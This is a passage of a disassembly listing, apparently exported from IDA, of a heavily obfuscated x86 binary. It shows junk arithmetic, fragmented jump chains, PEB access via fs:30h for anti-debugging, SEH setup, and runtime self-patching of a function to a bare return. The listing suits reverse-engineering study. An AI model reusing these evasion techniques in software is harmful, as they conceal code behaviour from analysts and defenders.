; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EB56

loc_459889:				; CODE XREF: sub_44EB56-D8A7j
		pop	ecx
		xchg	eax, [esp+4+var_4]
		push	eax
		pop	ebp
		pop	eax

locret_459890:				; CODE XREF: sub_443EA0:loc_459445j
		retn
; END OF FUNCTION CHUNK	FOR sub_44EB56
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_474. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_459892:				; CODE XREF: y2kk37jd:0043E2A4j
		push	ebx
		push	522AC75Ah
		xchg	eax, [esp]
		mov	ebx, eax
		pop	eax
		add	ebx, 341D980Bh
		xor	ebx, 0AC7FAF42h
		jmp	loc_457614
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DD9

loc_4598AF:				; CODE XREF: sub_458DD9:loc_44D2ECj
		mov	edi, eax
		xchg	edi, [esp+0]
		push	eax
		mov	edx, eax
		call	sub_4456D8

loc_4598BC:				; CODE XREF: y2kk37jd:0044ED61j
		xchg	ebx, [edx]
; END OF FUNCTION CHUNK	FOR sub_458DD9

; =============== S U B	R O U T	I N E =======================================



sub_4598BE	proc near		; CODE XREF: sub_443ECB+1p

; FUNCTION CHUNK AT 0043C98A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452A66 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00458068 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		jmp	loc_43C98A
sub_4598BE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E03C

loc_4598CC:				; CODE XREF: sub_43E03C+1286j
					; sub_43E03C:loc_44F09Bj
		call	sub_458A74
; END OF FUNCTION CHUNK	FOR sub_43E03C
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4598D1:				; CODE XREF: sub_445226-885Aj
		jmp	loc_451911
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451A35

loc_4598D6:				; CODE XREF: sub_451A35-15A23j
		xchg	edx, [esp+0]
		jmp	sub_4526B7
; END OF FUNCTION CHUNK	FOR sub_451A35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_4598DE:				; CODE XREF: sub_442A84+11C40j
		ja	loc_443835

loc_4598E4:				; CODE XREF: sub_43C851:loc_457CCFj
		push	7FD0463Ah
		pop	eax
		and	eax, 0D9652CA1h
		sub	eax, 0F46BCFF1h
		jns	loc_448478

loc_4598FC:				; CODE XREF: sub_44D006+8j
		jmp	nullsub_288
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4415B8

loc_459901:				; CODE XREF: sub_4415B8:loc_44AB6Fj
		xor	esi, 7222B36h
		xchg	esi, [esp+0]
		call	sub_447E3E

loc_45990F:				; CODE XREF: sub_44252E:loc_446561j
		call	sub_4581BB
		push	0EEEEBF20h
		pop	eax
		add	eax, 2412F275h
		rol	eax, 1Bh
		add	eax, 2FDF23ADh
		jmp	loc_44A2B5
; END OF FUNCTION CHUNK	FOR sub_4415B8
; ---------------------------------------------------------------------------

loc_45992E:				; CODE XREF: y2kk37jd:0043FBE2j
					; y2kk37jd:0045ADA0j
		test	edi, 2B396A84h
		jmp	loc_44C6B0
; ---------------------------------------------------------------------------
		db 3Bh,	0FBh, 0E9h
		dd 0FFFE1C9Ch
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_459940:				; CODE XREF: sub_445226+8Cj
		cdq
		sbb	edx, eax
		adc	ecx, edi
		jmp	loc_442510
; END OF FUNCTION CHUNK	FOR sub_445226
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_53. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45704E

loc_45994B:				; CODE XREF: sub_45704E-9B98j
		jmp	nullsub_377
; END OF FUNCTION CHUNK	FOR sub_45704E
; ---------------------------------------------------------------------------

loc_459950:				; CODE XREF: y2kk37jd:004408A9j
		add	edx, eax
		sub	edx, 425A21EAh
		cdq
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_459959:				; CODE XREF: sub_43F75D:loc_44089Cj
		add	eax, 46CF75F3h
		sub	eax, 308AA7Dh
		xor	eax, 1496C5E4h
		push	ecx
		jmp	loc_445FE0
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455DDE

loc_459971:				; CODE XREF: sub_455DDE:loc_44CDC9j
		mov	ebp, eax
		call	sub_45A865
; END OF FUNCTION CHUNK	FOR sub_455DDE
; START	OF FUNCTION CHUNK FOR sub_4518C3

loc_459978:				; CODE XREF: sub_4518C3-1553Dj
		jmp	loc_45C1A0
; END OF FUNCTION CHUNK	FOR sub_4518C3
; ---------------------------------------------------------------------------

locret_45997D:				; CODE XREF: y2kk37jd:00449478j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_45997E:				; CODE XREF: sub_43ED86:loc_4418DDj
		push	edx
		push	0E8216519h
		pop	edx
		rol	edx, 4
		add	edx, 66307DDh
		jmp	loc_44AFBE
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
		add	edi, esi
		test	edx, 84B4B380h
		jmp	loc_43E5B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_4599A0:				; CODE XREF: sub_43F75D-31B4j
		or	eax, 0F6256FD1h
		rol	eax, 8
		and	eax, 19C0BBEBh
		test	eax, 1000h
		jmp	loc_44C64F
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_4599BA:				; CODE XREF: sub_44C4BC:loc_448B01j
		mov	ebp, esi
		pop	esi
		retn
; END OF FUNCTION CHUNK	FOR sub_44C4BC

; =============== S U B	R O U T	I N E =======================================



sub_4599BE	proc near		; CODE XREF: y2kk37jd:loc_43B023j
					; sub_44DBC7:loc_43B5A4j ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043B9C3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CAFD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F9D3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00440ED6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441823 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00441A12 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441F3B SIZE 00000023 BYTES
; FUNCTION CHUNK AT 004443B8 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004455DD SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0044577D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004468AA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004485D5 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044AE6D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B0C5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D797 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044E830 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00451589 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00453E70 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045B23A SIZE 0000000E BYTES

		push	ebp
		jmp	loc_4443B8
sub_4599BE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44723A

loc_4599C4:				; CODE XREF: sub_44723A+140F1j
		jge	loc_444C21

loc_4599CA:				; CODE XREF: sub_44723A:loc_45B5D2j
		lea	edx, [ebp-14h]
		mov	eax, offset loc_44662C
		call	sub_4581BB
		lea	eax, [ebp-14h]
		jmp	loc_455CD5
; END OF FUNCTION CHUNK	FOR sub_44723A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44291B

loc_4599DF:				; CODE XREF: sub_44291B+18j
		push	esi
		push	0E3DBB993h
		pop	esi
		xor	esi, 8619DFD3h
		cmp	esi, 0AD3DB529h
		jmp	loc_453FE9
; END OF FUNCTION CHUNK	FOR sub_44291B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FB21

loc_4599F7:				; CODE XREF: sub_44FB21:loc_441971j
		or	ebx, 0EEE0513Eh
		sbb	ebp, eax
		jmp	loc_44505A
; END OF FUNCTION CHUNK	FOR sub_44FB21
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_459A04:				; CODE XREF: sub_44001E:loc_4416B0j
		pop	edx
		sub	edx, 41D8F209h
		or	edx, 0E8E6C8ACh
		call	sub_459546

loc_459A16:				; CODE XREF: sub_444E83+AB3j
		jmp	loc_452DBE
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D3EB

loc_459A1B:				; CODE XREF: sub_43D3EB+11EF1j
		or	ecx, 41A5E88Bh
		push	offset loc_456163
		jmp	locret_45B823
; END OF FUNCTION CHUNK	FOR sub_43D3EB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_459A2B:				; CODE XREF: sub_445226:loc_43BED1j
		xchg	ecx, [esp+0Ch+var_C]
		jmp	loc_449FD0
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F0A5

loc_459A33:				; CODE XREF: sub_43F0A5:loc_442CE5j
		call	loc_445277
		mov	eax, large fs:30h
		add	eax, 525187Dh
		add	eax, 0FADAE7EBh
		mov	eax, [eax]
		push	offset sub_45B0A5
		jmp	nullsub_399
; END OF FUNCTION CHUNK	FOR sub_43F0A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458852

loc_459A57:				; CODE XREF: sub_458852:loc_458870j
		mov	[ebx], eax
		pop	ebx
		call	sub_447DC5

loc_459A5F:				; CODE XREF: sub_43C18D+13949j
		jmp	nullsub_479
; END OF FUNCTION CHUNK	FOR sub_458852
; ---------------------------------------------------------------------------
		push	13079D82h
		pop	eax
		rol	eax, 1Ch
		add	eax, 0E47481E3h
		call	sub_442C3E
		jmp	loc_4463B5

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_459A7D	proc near		; CODE XREF: sub_43D61E+6p
					; sub_43DF1F:loc_44431Cp ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043ED71 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00448729 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044C27E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00453DF7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458476 SIZE 0000001F BYTES

		push	ebp
		mov	ebp, esp
		push	edi
		mov	edi, ecx
		xchg	edi, [esp+0]
		mov	[ebp+var_4], eax
		jmp	loc_453DF7
sub_459A7D	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_328. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6B5

loc_459A8F:				; CODE XREF: sub_44A6B5-230Bj
		jmp	loc_455D2D
; END OF FUNCTION CHUNK	FOR sub_44A6B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4577FE

loc_459A94:				; CODE XREF: sub_4577FE:loc_457816j
		jz	sub_4420C5
		jmp	loc_446AB5
; END OF FUNCTION CHUNK	FOR sub_4577FE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_110. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_459AA0:				; CODE XREF: y2kk37jd:0043D7FFj
		jmp	sub_43BA66
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_459AA5:				; CODE XREF: sub_453867-17595j
		jmp	loc_45302C
; END OF FUNCTION CHUNK	FOR sub_453867
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_33. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAA6

loc_459AAB:				; CODE XREF: sub_44DAA6+Ej
		jmp	nullsub_291
; END OF FUNCTION CHUNK	FOR sub_44DAA6

; =============== S U B	R O U T	I N E =======================================



sub_459AB0	proc near		; CODE XREF: y2kk37jd:00440ADFp

; FUNCTION CHUNK AT 00451A8B SIZE 00000017 BYTES

		push	large dword ptr	fs:0
		mov	large fs:0, esp
		call	sub_4448C1
		jmp	loc_451A8B
sub_459AB0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BAF

loc_459AC8:				; CODE XREF: sub_443BAF-2D65j
		and	ecx, 0EF4E422Dh
		add	ecx, 315E220Bh
		push	offset loc_456972
		jmp	nullsub_292
; END OF FUNCTION CHUNK	FOR sub_443BAF

; =============== S U B	R O U T	I N E =======================================



sub_459ADE	proc near		; CODE XREF: sub_4458DD-4E15p
					; sub_43F911:loc_44DE34j ...
		xchg	edx, [esp+0]
		pop	edx
		push	esi
		pop	ebp
		pop	esi
		retn
sub_459ADE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45689F

loc_459AE6:				; CODE XREF: sub_45689F+59EDj
		jmp	nullsub_431
; END OF FUNCTION CHUNK	FOR sub_45689F
; ---------------------------------------------------------------------------

loc_459AEB:				; CODE XREF: y2kk37jd:0045A6A1j
		jmp	loc_452951
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457AE8

loc_459AF0:				; CODE XREF: sub_457AE8:loc_457AFAj
		jmp	nullsub_440
; END OF FUNCTION CHUNK	FOR sub_457AE8
; ---------------------------------------------------------------------------

loc_459AF5:				; CODE XREF: y2kk37jd:0043DA92j
		jmp	loc_457563

; =============== S U B	R O U T	I N E =======================================



sub_459AFA	proc near		; CODE XREF: sub_45A632:loc_440AD9j
					; sub_44E9BA+7p ...

; FUNCTION CHUNK AT 00458843 SIZE 00000005 BYTES

		mov	eax, 0DBDF2D23h
		jmp	loc_458843
sub_459AFA	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_504. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jmp	locret_44F095
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_459B0A:				; CODE XREF: sub_456809+3899j
		push	0D449B74h
		pop	eax
		add	eax, 0FE11079Bh
		jmp	loc_45B96D
; END OF FUNCTION CHUNK	FOR sub_456809
; ---------------------------------------------------------------------------

loc_459B1B:				; CODE XREF: y2kk37jd:loc_446D33j
					; y2kk37jd:0044839Fj
		mov	eax, offset off_44BDA8
		push	edi
		push	0C8914A86h
		pop	edi
		xor	edi, 58EAE07Fh
		jmp	loc_450BA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440040

loc_459B32:				; CODE XREF: sub_440040+12935j
		add	eax, 0ABECF68Fh
		test	ebp, ebx
		jmp	loc_43D29E
; END OF FUNCTION CHUNK	FOR sub_440040
; ---------------------------------------------------------------------------

loc_459B3F:				; CODE XREF: y2kk37jd:loc_45815Bj
					; DATA XREF: sub_43F346+18E0Bo
		add	edx, ebp
		push	edi
		push	0E87D122Dh
		pop	edi
		xor	edi, 8B427DCEh
		jnz	loc_45154E

loc_459B54:				; CODE XREF: y2kk37jd:0044059Ej
		jmp	loc_44F171
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_399. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424B0

loc_459B5A:				; CODE XREF: sub_4424B0-5D95j
		jmp	loc_44EBD4
; END OF FUNCTION CHUNK	FOR sub_4424B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445083

loc_459B5F:				; CODE XREF: sub_445083-8CCFj
		jmp	nullsub_294
; END OF FUNCTION CHUNK	FOR sub_445083
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_459B64:				; CODE XREF: sub_44113A:loc_454D4Cj
		jz	loc_43EAC3
		jmp	loc_455DAE
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------

loc_459B6F:				; CODE XREF: y2kk37jd:loc_43BBBFj
		js	loc_45627B
; START	OF FUNCTION CHUNK FOR sub_4487FD

loc_459B75:				; CODE XREF: sub_4487FD+1081Fj
		jmp	nullsub_295
; END OF FUNCTION CHUNK	FOR sub_4487FD
; ---------------------------------------------------------------------------

loc_459B7A:				; CODE XREF: y2kk37jd:00455665j
		jmp	locret_44E4DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C922

loc_459B7F:				; CODE XREF: sub_44C922+1Aj
		jmp	loc_443230
; END OF FUNCTION CHUNK	FOR sub_44C922
; ---------------------------------------------------------------------------
		mov	ebx, [ecx]
		rol	esi, 1Bh
		add	ebp, 7C09ABCBh
		jmp	loc_44EF9A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0C9

loc_459B94:				; CODE XREF: sub_43D0C9+9j
		mov	edx, eax
		pop	eax

loc_459B97:				; CODE XREF: y2kk37jd:loc_43E0D8j
		mov	eax, [esp-4+arg_0]
		push	offset sub_4562E5
		jmp	nullsub_296
; END OF FUNCTION CHUNK	FOR sub_43D0C9
; ---------------------------------------------------------------------------
		xchg	ebx, [esp]
		push	ebx
		pop	eax
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_459BA9:				; CODE XREF: sub_44CDD5:loc_452615j
		pop	ebx
		call	sub_445557
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; START	OF FUNCTION CHUNK FOR sub_441856

loc_459BAF:				; CODE XREF: sub_441856+9j
		jmp	loc_44688A
; END OF FUNCTION CHUNK	FOR sub_441856
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_459BB4:				; CODE XREF: sub_44606C:loc_44D064j
		mov	edi, [eax]
		add	eax, 4
		mov	esi, [eax]
		add	eax, 4
		push	offset sub_441070
		jmp	sub_448949
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DA43

loc_459BC8:				; CODE XREF: sub_43DA43:loc_43B36Ej
		push	edi
		push	0EEA272FAh
		pop	edi
		xor	edi, 49AF17Fh
		jmp	loc_450363
; END OF FUNCTION CHUNK	FOR sub_43DA43
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_459BDA:				; CODE XREF: sub_4448E2+10FD8j
		push	edx
		push	978F3CE4h
		xchg	ebx, [esp+0]
		mov	edx, ebx
		pop	ebx
		or	edx, 9027837Dh
		sub	edx, 5EEE2D9Bh
		jmp	loc_44552D
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465C3

loc_459BF7:				; CODE XREF: sub_4465C3-2A65j
		popf
		jmp	loc_445FC6
; END OF FUNCTION CHUNK	FOR sub_4465C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_459BFD:				; CODE XREF: sub_4448E2+1492Aj
		jz	loc_452F6F
		jmp	loc_43C658
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_459C08:				; CODE XREF: sub_453867:loc_450DEFj
		pop	eax
		rol	eax, 14h
		sub	eax, 0C64782C0h
		xor	eax, 6C84F2B3h
		add	eax, ebp
		jmp	loc_44D2DC
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD78

loc_459C1F:				; CODE XREF: sub_43BD78+8j
		jz	loc_459D1A
		jmp	loc_4511C0
; END OF FUNCTION CHUNK	FOR sub_43BD78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453B38

loc_459C2A:				; CODE XREF: sub_453B38:loc_43FE6Cj
		pop	ecx
		rol	ecx, 0Ch
		sub	ecx, 47E4002Bh
		test	ecx, 20h
		jmp	loc_44AEAD
; END OF FUNCTION CHUNK	FOR sub_453B38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424B0

loc_459C3F:				; CODE XREF: sub_4424B0+6DDj
		adc	ebx, edi
		mov	esi, 23BD601Bh
		and	ebx, ebp
		sub	esi, 0CB5D6A67h

loc_459C4E:				; CODE XREF: sub_4424B0:loc_4541D2j
		call	sub_45405E
		push	70E4D7A1h
		jmp	loc_43EB79
; END OF FUNCTION CHUNK	FOR sub_4424B0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_459C5D:				; CODE XREF: sub_445226:loc_4452D5j
		jz	loc_4438E2
		jmp	loc_458255
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_4439A0
		jmp	loc_44D43A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_459C75:				; CODE XREF: sub_43F911+F733j
		jnp	loc_45C229
		pop	ecx
		jmp	loc_44CBDC
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
		sbb	esi, 8CEED641h
		ror	esi, 0Ch
		or	edi, 0BA9F8A74h
		add	eax, 0B6B70F9Ah
		jge	loc_45814B
		jmp	loc_43D983
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_459CA1:				; CODE XREF: sub_44001E:loc_459657j
		jl	loc_4431DD
		mov	eax, edx
		xchg	ecx, eax
		jmp	loc_4431DD
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_459CB0:				; CODE XREF: sub_457A46-172CDj
		or	ecx, 86F7459Bh
		jnp	loc_444E5E
		jmp	loc_44DF73
; END OF FUNCTION CHUNK	FOR sub_457A46
; ---------------------------------------------------------------------------
		test	eax, 8FD54A3h
		jmp	loc_451D83
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44201B

loc_459CCC:				; CODE XREF: sub_44201B:loc_440C38j
					; y2kk37jd:004549C3j
		sub	ebx, ebp
		jmp	loc_43CB92
; END OF FUNCTION CHUNK	FOR sub_44201B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443AA7

loc_459CD3:				; CODE XREF: sub_443AA7:loc_458E84j
		pop	esi
		mov	eax, [eax]
		test	eax, 1
		jz	loc_459829
		jmp	loc_448FFD
; END OF FUNCTION CHUNK	FOR sub_443AA7
; ---------------------------------------------------------------------------

loc_459CE6:				; CODE XREF: y2kk37jd:004409FFj
		xor	edi, 0F6421273h
		test	edi, 80000000h
		jmp	loc_441887
; ---------------------------------------------------------------------------

loc_459CF7:				; CODE XREF: y2kk37jd:004522E8j
		jns	loc_43C457
		adc	esi, ecx
		jmp	loc_4513C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457026

loc_459D04:				; CODE XREF: sub_457026-4653j
		mov	esp, ebp
		push	offset loc_43D501
		jmp	loc_44C41E
; END OF FUNCTION CHUNK	FOR sub_457026
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD78

loc_459D10:				; CODE XREF: sub_43BD78+1544Ej
		xchg	eax, esi

loc_459D12:				; CODE XREF: y2kk37jd:loc_43F01Dj
		or	eax, 0E450107h
		or	esi, ecx

loc_459D1A:				; CODE XREF: sub_43BD78:loc_459C1Fj
		push	ecx
		push	0CC11AD52h
		pop	ecx
		xor	ecx, 0B0A8BE8Dh
		or	ecx, 53AE9BD9h
		jmp	loc_441D59
; END OF FUNCTION CHUNK	FOR sub_43BD78
; ---------------------------------------------------------------------------
		test	ebp, edi
		jmp	loc_452DE9
; ---------------------------------------------------------------------------

loc_459D39:				; CODE XREF: y2kk37jd:00450638j
		jz	loc_447FD8
		jmp	loc_43D6B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45981F

loc_459D44:				; CODE XREF: sub_45981F-B6C2j
		xor	ecx, 0E2C7283h
; END OF FUNCTION CHUNK	FOR sub_45981F
; START	OF FUNCTION CHUNK FOR sub_453867

loc_459D4A:				; CODE XREF: sub_453867:loc_44E13Aj
		xor	esi, ds:4000ECh
		or	esi, 7221CE7Fh
		test	esi, 800000h
		jmp	loc_449068
; END OF FUNCTION CHUNK	FOR sub_453867
; ---------------------------------------------------------------------------

loc_459D61:				; CODE XREF: y2kk37jd:004442CBj
		jl	loc_43C63E
		or	ebp, esi
		ja	loc_43B20A
		and	ebp, 7A0DA1A4h

loc_459D75:				; CODE XREF: y2kk37jd:loc_44F171j
		call	sub_43F520
		retn
; ---------------------------------------------------------------------------

loc_459D7B:				; CODE XREF: y2kk37jd:00440598j
		call	sub_4577FE
		test	al, al
		jmp	loc_43D9A0
; ---------------------------------------------------------------------------

loc_459D87:				; CODE XREF: y2kk37jd:0044D369j
		js	loc_44D888
		popf
		rol	eax, 12h
		shl	eax, 1Bh

loc_459D94:				; CODE XREF: y2kk37jd:loc_447222j
		push	8C18904Eh
		pop	eax
		and	eax, 0C74474BAh
		jmp	loc_45C59C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_459DA5:				; CODE XREF: sub_454413:loc_448B8Dj
		pop	ebx
		mov	[ebp-4], eax
		mov	eax, [ebp-10h]
		test	eax, eax
		jle	loc_44D501
		jmp	loc_44E116
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
		sub	ebx, eax
		jmp	sub_45B18C
; ---------------------------------------------------------------------------

loc_459DC0:				; CODE XREF: y2kk37jd:0044BFBFj
		jnz	loc_45945B
		jmp	loc_457DCD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_372. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		xchg	eax, [esi]
		jmp	loc_454DC7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_485. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F0C

loc_459DD4:				; CODE XREF: sub_457F0C+Cj
		jmp	locret_445368
; END OF FUNCTION CHUNK	FOR sub_457F0C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44615F

loc_459DD9:				; CODE XREF: sub_44615F+F785j
		jmp	loc_4590CB
; END OF FUNCTION CHUNK	FOR sub_44615F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445E1C

loc_459DDE:				; CODE XREF: sub_445E1C+11j
		jmp	loc_4485B8
; END OF FUNCTION CHUNK	FOR sub_445E1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_459DE3:				; CODE XREF: sub_445226:loc_452000j
		mov	edx, 0F78D9DBDh
		call	sub_440CD1
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+10h+var_10]
		jmp	loc_4424C0
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_459DF8	proc near		; DATA XREF: y2kk37jd:loc_453E48o
		mov	[ebx], eax
		pop	ebx
		call	sub_44FA95
		call	sub_44B949

loc_459E05:				; CODE XREF: sub_458F38+3j
		jmp	sub_442C3E
sub_459DF8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_459E0A:				; CODE XREF: y2kk37jd:0044893Aj
		jmp	loc_44F7BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446FEB

loc_459E0F:				; CODE XREF: sub_446FEB+7j
		jmp	loc_441AF3
; END OF FUNCTION CHUNK	FOR sub_446FEB
; ---------------------------------------------------------------------------

locret_459E14:				; CODE XREF: y2kk37jd:0045607Bj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4444CA

loc_459E15:				; CODE XREF: sub_4444CA+Dj
		mov	edx, edi
		pop	edi
		mov	eax, [esp-0Ch+arg_8]
		push	edx
		push	edx
		push	5DC8F897h
		pop	edx

loc_459E23:				; CODE XREF: y2kk37jd:loc_43BFA8j
		jmp	loc_4589C6
; END OF FUNCTION CHUNK	FOR sub_4444CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FEFB

loc_459E28:				; CODE XREF: sub_43FEFB+1A1Fj
		jb	loc_43E3F5
		add	ebp, 830237EBh
		jmp	loc_440CAB
; END OF FUNCTION CHUNK	FOR sub_43FEFB
; ---------------------------------------------------------------------------
		xchg	eax, [ebp+0]
		jmp	sub_44AF36
; ---------------------------------------------------------------------------

loc_459E41:				; DATA XREF: y2kk37jd:00456076o
		lea	eax, sub_4430DD
		mov	byte ptr [eax],	0C3h
		jmp	loc_447823
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4430DD

loc_459E4F:				; CODE XREF: sub_4430DDj
		pop	edx
		mov	eax, [esp-4+arg_0]
		jmp	sub_440A47
; END OF FUNCTION CHUNK	FOR sub_4430DD
; ---------------------------------------------------------------------------
